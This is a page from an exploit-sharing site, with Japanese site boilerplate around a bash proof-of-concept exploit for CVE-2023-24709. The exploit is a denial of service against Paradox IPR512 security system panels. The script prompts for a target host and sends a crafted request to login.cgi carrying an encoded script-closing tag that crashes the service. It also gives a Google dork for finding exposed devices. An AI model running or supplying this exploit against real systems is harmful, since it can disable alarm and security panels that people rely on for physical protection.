0day.today - 最大、世界でのデータベースを利用します。
![](/img/logo_green.jpg)
- 私たちは一つのメインのドメインを使用します。http://0day.today
- 材料のほとんどは 完全に無料
- あなたがしたい場合は エクスプロイトを購入 / V.I.P.を取得アクセス または任意の他のサービスのために支払います、
あなたが購入したり、獲得する必要があります金
ログイン このサイトの管理者が使用しています公式の連絡先.詐欺師にご注意!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
次の方法でご連絡することができます:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Paradox Security Systems IPR512 - Denial Of Service Exploit
#!/bin/bash # Exploit Title: Paradox Security Systems IPR512 - Denial Of Service # Google Dork: intitle:"ipr512 * - login screen" # Date: 09-APR-2023 # Exploit Author: Giorgi Dograshvili # Vendor Homepage: Paradox - Headquarters <https://www.paradox.com/Products/default.asp?PID=423> (https://www.paradox.com/Products/default.asp?PID=423) # Version: IPR512 # CVE : CVE-2023-24709 # Function to display banner message display_banner() { echo "******************************************************" echo "* *" echo "* PoC CVE-2023-24709 *" echo "* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *" echo "* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *" echo "* by SlashXzerozero *" echo "* *" echo "******************************************************" } # Call the function to display the banner display_banner echo "" echo "" echo "Please enter a domain name or IP address with or without port" read -p "(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): " domain # Step 2: Ask for user confirmation read -p "This will DAMAGE the service. Do you still want it to proceed? (Y/n): " confirm if [[ $confirm == "Y" || $confirm == "y" ]]; then # Display loading animation animation=("|" "/" "-" "\\") index=0 while [[ $index -lt 10 ]]; do echo -ne "Loading ${animation[index]} \r" sleep 1 index=$((index + 1)) done # Use curl to send HTTP GET request with custom headers and timeout response=$(curl -i -s -k -X GET \ -H "Host: $domain" \ -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36" \ -H "Accept: */" \ -H "Referer: http://$domain/login.html" \ -H "Accept-Encoding: gzip, deflate" \ -H "Accept-Language: en-US,en;q=0.9" \ -H "Connection: close" \ --max-time 10 \ "http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982") # Check response for HTTP status code 200 and print result if [[ $response == *"HTTP/1.1 200 OK"* ]]; then echo -e "\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html" else echo -e "\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html" fi else echo "The script is stopped!." fi # 0day.today [2024-07-04] #